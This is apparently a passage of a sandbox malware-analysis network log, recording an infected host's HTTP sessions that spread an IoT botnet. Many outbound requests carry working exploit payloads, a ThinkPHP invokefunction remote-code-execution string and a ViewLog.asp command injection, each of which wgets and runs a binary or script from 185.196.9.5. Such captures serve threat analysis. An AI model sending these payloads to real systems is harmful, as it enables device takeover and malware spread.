65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 37 66 30 31 30 30 32 26 23 34 36 3b 31 37 30 38 38 38 34 31 37 30 26 23 34 36 3b 34 38 36 65 64 32 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.57f01002.1708884170.486ed2c</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
150	192.168.2.15	38658	112.29.212.224	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:50.348356009 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:50.714684963 CET	486	IN	HTTP/1.1 400 Bad Request Server: Tengine Date: Sun, 25 Feb 2024 18:02:50 GMT Content-Type: text/html Content-Length: 249 Connection: close Via: ens-cache19.cn6653[,0] Timing-Allow-Origin: * EagleId: 0000000017088841705263572e Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>400 Bad Request</h1><p>Your browser sent a request that this server could not understand.<hr/>Powered by Tengine</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
151	192.168.2.15	46736	31.0.213.31	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:50.565165997 CET	57	IN	HTTP/1.1 400 Bad Request Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
152	192.168.2.15	37508	95.86.99.164	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:50.875891924 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
153	192.168.2.15	41236	94.123.159.76	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:51.101996899 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
154	192.168.2.15	58414	94.120.99.154	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:51.106354952 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
155	192.168.2.15	38526	62.122.172.240	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:51.839685917 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:52.742352962 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
156	192.168.2.15	51164	94.121.211.48	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:51.888786077 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
157	192.168.2.15	50456	112.17.17.36	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:52.157542944 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:52.556072950 CET	361	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sun, 25 Feb 2024 18:02:52 GMT Content-Type: text/html Content-Length: 154 Connection: close Request-Id: 65db80cce8f34626c9d3cecfdf3374b8 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
158	192.168.2.15	50454	112.17.17.36	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:52.160192966 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:52.557610035 CET	361	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sun, 25 Feb 2024 18:02:52 GMT Content-Type: text/html Content-Length: 154 Connection: close Request-Id: 65db80cc18729366a0d6aea748427807 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
159	192.168.2.15	52714	94.242.231.186	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:52.239419937 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
160	192.168.2.15	33908	94.187.99.136	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:52.329277039 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
161	192.168.2.15	46694	94.122.2.32	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:52.340647936 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
162	192.168.2.15	49278	94.123.138.245	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:52.340708971 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
163	192.168.2.15	52772	94.123.23.67	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:52.341871977 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
164	192.168.2.15	57424	94.123.188.58	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:52.342261076 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
165	192.168.2.15	58858	95.56.123.235	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:52.383470058 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
166	192.168.2.15	58876	95.56.123.235	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:52.938468933 CET	284	IN	HTTP/1.1 400 Bad Request Server: micro_httpd Cache-Control: no-cache Date: Sun, 25 Feb 2024 18:02:52 GMT Content-Type: text/html Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.

Session ID	Source IP	Source Port	Destination IP	Destination Port
167	192.168.2.15	48572	31.136.140.244	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:53.230649948 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:53.798510075 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:54.950217962 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:57.254225969 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:01.862231970 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:11.078341961 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:30.789892912 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:07.653543949 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
168	192.168.2.15	49988	94.74.204.33	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:53.246290922 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:53.449590921 CET	548	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:02:52 GMT Server: X-Frame-Options: SAMEORIGIN Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval' ; object-src 'self' ; worker-src 'self' blob: Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
169	192.168.2.15	49492	62.29.38.64	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:53.268145084 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
170	192.168.2.15	38514	31.200.37.129	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:53.270509005 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
171	192.168.2.15	40042	88.31.76.241	80

Timestamp	Bytes transferred	Direction	Data
